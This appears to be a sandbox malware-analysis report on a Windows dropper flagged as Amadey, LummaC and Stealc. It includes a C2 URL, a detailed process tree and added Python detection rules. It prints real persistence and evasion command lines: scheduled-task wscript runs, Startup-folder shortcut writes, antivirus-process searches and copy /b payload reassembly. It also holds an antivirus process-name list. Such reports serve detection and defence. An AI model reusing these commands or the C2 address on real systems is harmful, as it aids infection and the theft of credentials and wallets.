Windows Analysis Report
mQRr8Rkorf.exe

Overview

General Information

Sample name: mQRr8Rkorf.exe (renamed because the original name is a hash value)
Original sample name: 3257a90914b6dfdb338969b2a58a260a.exe
Analysis ID: 1631980
MD5: 3257a90914b6dfdb338969b2a58a260a
SHA1: 8760b6b9e7412e1346b5427a0e92e7399d226561
SHA256: 8b91be73c8fdc9e0d3f9771945bd8d6cead01382bf4b9c68fd056047c7249b8f
Tags: exe, user-abuse_ch

Detection

Malware families: Amadey, LummaC Stealer, Stealc
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey
Yara detected Amadey's Clipper DLL
Yara detected LummaC Stealer
Yara detected Stealc
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to start a terminal service
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into foreign processes
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes many files with high entropy
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Publisher Attachment File Dropped In Suspicious Location
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • mQRr8Rkorf.exe (PID: 6276 cmdline: "C:\Users\user\Desktop\mQRr8Rkorf.exe" MD5: 3257A90914B6DFDB338969B2A58A260A)
    • A7B94.exe (PID: 6368 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe MD5: F5FED53F8E4B3DAD6429075E4C7C8FC6)
      • 1E08u3.exe (PID: 6468 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\1E08u3.exe MD5: E67596E44012BAC363634BE64FFB53A2)
        • rapes.exe (PID: 2668 cmdline: "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: E67596E44012BAC363634BE64FFB53A2)
      • 2R0700.exe (PID: 5204 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exe MD5: 3F95752BFFF9447467097A83E5F42E89)
  • rundll32.exe (PID: 6720 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • rundll32.exe (PID: 3556 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • rapes.exe (PID: 5588 cmdline: C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: E67596E44012BAC363634BE64FFB53A2)
    • HmngBpR.exe (PID: 5632 cmdline: "C:\Users\user~1\AppData\Local\Temp\10111840101\HmngBpR.exe" MD5: 8990CE4BE7D7049A51361A2FD9C6686C)
      • SplashWin.exe (PID: 3308 cmdline: C:\Users\user~1\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe MD5: 4D20B83562EEC3660E45027AD56FB444)
        • SplashWin.exe (PID: 484 cmdline: C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe MD5: 4D20B83562EEC3660E45027AD56FB444)
          • cmd.exe (PID: 6512 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • explorer.exe (PID: 5596 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
    • ADFoyxP.exe (PID: 4160 cmdline: "C:\Users\user~1\AppData\Local\Temp\10112790101\ADFoyxP.exe" MD5: 45C1ABFB717E3EF5223BE0BFC51DF2DE)
      • cmd.exe (PID: 2996 cmdline: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • expand.exe (PID: 5716 cmdline: expand Go.pub Go.pub.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)
        • tasklist.exe (PID: 3016 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 1680 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 852 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 4424 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 3588 cmdline: cmd /c md 353090 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 3904 cmdline: extrac32 /Y /E Really.pub MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 1700 cmdline: findstr /V "posted" Good MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 3552 cmdline: cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cmd.exe (PID: 1872 cmdline: cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Seat.com (PID: 3280 cmdline: Seat.com m MD5: 62D09F076E6E0240548C2F837536A46A)
          • cmd.exe (PID: 2140 cmdline: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 5248 cmdline: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • cmd.exe (PID: 2740 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 1992 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • 9hUDDVk.exe (PID: 3328 cmdline: "C:\Users\user~1\AppData\Local\Temp\10114440101\9hUDDVk.exe" MD5: 87FC5821B29F5CDEF4D118E71C764501)
    • pwHxMTy.exe (PID: 4056 cmdline: "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe" MD5: D3F96BF44CD5324EE9109A7E3DD3ACB4)
      • pwHxMTy.exe (PID: 3712 cmdline: "C:\Users\user~1\AppData\Local\Temp\10114630101\pwHxMTy.exe" MD5: D3F96BF44CD5324EE9109A7E3DD3ACB4)
      • WerFault.exe (PID: 4980 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 800 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 3028 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • TradeHub.com (PID: 3764 cmdline: "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.com" "C:\Users\user\AppData\Local\TradeSecure Innovations\F" MD5: 62D09F076E6E0240548C2F837536A46A)
  • SplashWin.exe (PID: 4952 cmdline: "C:\Users\user\AppData\Roaming\Dockerprotectysd\SplashWin.exe" MD5: 4D20B83562EEC3660E45027AD56FB444)
    • cmd.exe (PID: 4780 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls it for orders. Its main functionality is loading other payloads (called "tasks") onto all, or specifically targeted, computers compromised by the malware. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development draws on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution | - | https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Malware configuration (Amadey):
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Yara matches in network captures

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security | -
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | -
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | -

Yara matches in dropped files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exe | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | -
C:\Users\user\AppData\Local\Temp\10121660101\amnew.exe | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | -

Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | -
00000004.00000002.987084215.0000000000711000.00000040.00000001.01000000.00000009.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | -
0000002E.00000002.2016617729.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
00000005.00000003.1097981161.000000000069D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
00000003.00000002.982319426.0000000000711000.00000040.00000001.01000000.00000009.sdmp | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | -
(5 of 10 entries shown)

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
46.2.pwHxMTy.exe.400000.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
46.2.pwHxMTy.exe.400000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
45.2.pwHxMTy.exe.4209550.0.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -
5.2.2R0700.exe.980000.0.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security | -

System Summary

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5248, ProcessName: schtasks.exe

Source: Process started
Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community
Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 3028, ProcessName: wscript.exe

Source: File created
Author: Nasreddine Bencherchali (Nextron Systems)
Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exe, ProcessId: 4160, TargetFilename: C:\Users\user~1\AppData\Local\Temp\Argentina.pub

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2140, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F, ProcessId: 5248, ProcessName: schtasks.exe

Source: Process started
Author: frack113, Nasreddine Bencherchali
Data: Command: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe, CommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exe, ParentCommandLine: "C:\Users\user\Desktop\mQRr8Rkorf.exe", ParentImage: C:\Users\user\Desktop\mQRr8Rkorf.exe, ParentProcessId: 6276, ParentProcessName: mQRr8Rkorf.exe, ProcessCommandLine: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\A7B94.exe, ProcessId: 6368, ProcessName: A7B94.exe

Source: Process started
Author: Michael Haag
Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TradeSecure Innovations\TradeHub.js", ProcessId: 3028, ProcessName: wscript.exe

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\mQRr8Rkorf.exe, ProcessId: 6276, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Source: Process started
Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6512, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 5596, ProcessName: explorer.exe

Data Obfuscation

Source: File created
Author: Joe Security
Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 2740, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url

HIPS / PFW / Operating System Protection Evasion

Source: Process started
Author: Joe Security
Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 4424, ProcessName: findstr.exe
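The dropper chain in the process tree (expand.exe turning Go.pub into a .bat, tasklist piped into findstr for security-product names, copy /b stitching a payload back together from dozens of inert .pub chunks, a schtasks task that runs wscript //B every five minutes, and an [InternetShortcut] .url written into the Startup folder) is the behaviour the Sigma hits above encode. The Python below is an added example, not Joe Sandbox output and not code from the sample: it writes those checks as small rule functions and runs them over a constructed list of process-creation and file-creation records built from the command lines in the Classification tree (chunk lists shortened). The field names Image, CommandLine and TargetFilename mimic Sysmon, but the records are hand-built here rather than real telemetry.

```python
"""Sigma-style checks for the dropper behaviour shown in this report's process tree.

Added example, not Joe Sandbox output. EVENTS is constructed from the command
lines printed in the Classification tree; field names imitate Sysmon.
"""
import re

# Security-product process names the dropper's own findstr calls search for.
AV_PROCESS_NAMES = {
    "opssvc", "wrsa", "bdservicehost", "avastui",
    "avgui", "nswscsvc", "ekrn", "sophoshealth",
}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def _image_name(event):
    return event.get("Image", "").rsplit("\\", 1)[-1].lower()


def scheduled_task_runs_script(event):
    """schtasks /create whose action launches wscript/cscript in batch (//B) mode."""
    if _image_name(event) != "schtasks.exe":
        return False
    cmd = event.get("CommandLine", "").lower()
    return "/create" in cmd and "//b" in cmd and re.search(r"\b[wc]script\b", cmd) is not None


def script_dropped_in_startup(event):
    """Script or shortcut written into the per-user Startup folder."""
    target = event.get("TargetFilename", "").lower()
    return STARTUP_DIR in target and target.endswith(
        (".url", ".lnk", ".js", ".jse", ".vbs", ".vbe", ".bat", ".cmd"))


def searches_for_av_process(event):
    """findstr given security-product process names (the tasklist | findstr idiom)."""
    if _image_name(event) != "findstr.exe":
        return False
    words = set(re.findall(r"[a-z0-9]+", event.get("CommandLine", "").lower()))
    return bool(words & AV_PROCESS_NAMES)


def reassembles_file_from_chunks(event, min_chunks=4):
    """copy /b a + b + c + ... target: a payload split into inert pieces is stitched back."""
    m = re.search(r"copy\s+/b\s+(.+)", event.get("CommandLine", ""), re.IGNORECASE)
    return m is not None and len(m.group(1).split("+")) >= min_chunks


def expands_archive_to_script(event):
    """expand.exe decompressing straight into a script file."""
    if _image_name(event) != "expand.exe":
        return False
    return event.get("CommandLine", "").lower().endswith((".bat", ".cmd", ".js", ".vbs", ".ps1"))


RULES = [
    ("Scheduled task runs a script in batch mode", scheduled_task_runs_script),
    ("Script or shortcut dropped in Startup folder", script_dropped_in_startup),
    ("Search for antivirus process", searches_for_av_process),
    ("File reassembled from chunks with copy /b", reassembles_file_from_chunks),
    ("expand.exe writes a script", expands_archive_to_script),
]


def evaluate(events):
    """Map each rule name to the command lines / target paths that triggered it."""
    hits = {name: [] for name, _ in RULES}
    for event in events:
        for name, check in RULES:
            if check(event):
                hits[name].append(event.get("CommandLine") or event.get("TargetFilename"))
    return {name: matched for name, matched in hits.items() if matched}


# Constructed records; command lines copied from the report, chunk lists shortened.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\schtasks.exe",
     "CommandLine": ('schtasks.exe /create /tn "Coast" /tr "wscript //B '
                     "'C:\\Users\\user\\AppData\\Local\\TradeSecure Innovations\\TradeHub.js'\""
                     " /sc minute /mo 5 /F")},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url"},
    {"Image": r"C:\Windows\SysWOW64\findstr.exe", "CommandLine": 'findstr /I "opssvc wrsa"'},
    {"Image": r"C:\Windows\SysWOW64\findstr.exe",
     "CommandLine": 'findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"'},
    {"Image": r"C:\Windows\SysWOW64\findstr.exe", "CommandLine": 'findstr /V "posted" Good'},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission 353090\Seat.com"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub m"},
    {"Image": r"C:\Windows\SysWOW64\expand.exe", "CommandLine": "expand Go.pub Go.pub.bat"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe", "CommandLine": "cmd /c md 353090"},
    {"Image": r"C:\Windows\system32\conhost.exe",
     "CommandLine": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

if __name__ == "__main__":
    for name, matched in evaluate(EVENTS).items():
        print(f"[{name}]")
        for line in matched:
            print("   ", line)
```

The chunk rule deliberately ignores the output file's extension: the second copy /b in the tree writes to a file named just "m", which is later passed to Seat.com as an argument, so keying on ".exe"/".com" would miss half of the reassembly.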
Suricata IDS Alerts

One table per matching signature; severity follows Suricata's priority scale (1 = highest).

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T18:09:36.620361+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49681 | 104.21.48.1 | 443 | TCP
2025-03-07T18:09:39.879522+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49682 | 104.21.48.1 | 443 | TCP
2025-03-07T18:09:42.631774+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49683 | 104.21.48.1 | 443 | TCP
2025-03-07T18:09:45.766754+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49684 | 104.21.48.1 | 443 | TCP
2025-03-07T18:09:49.586233+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49685 | 104.21.48.1 | 443 | TCP
2025-03-07T18:09:52.632829+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49686 | 104.21.48.1 | 443 | TCP
2025-03-07T18:09:57.416531+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49687 | 104.21.48.1 | 443 | TCP
2025-03-07T18:10:51.342583+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49705 | 104.21.112.1 | 443 | TCP
2025-03-07T18:10:58.444445+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49710 | 104.21.112.1 | 443 | TCP
2025-03-07T18:11:01.590304+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49714 | 104.21.112.1 | 443 | TCP
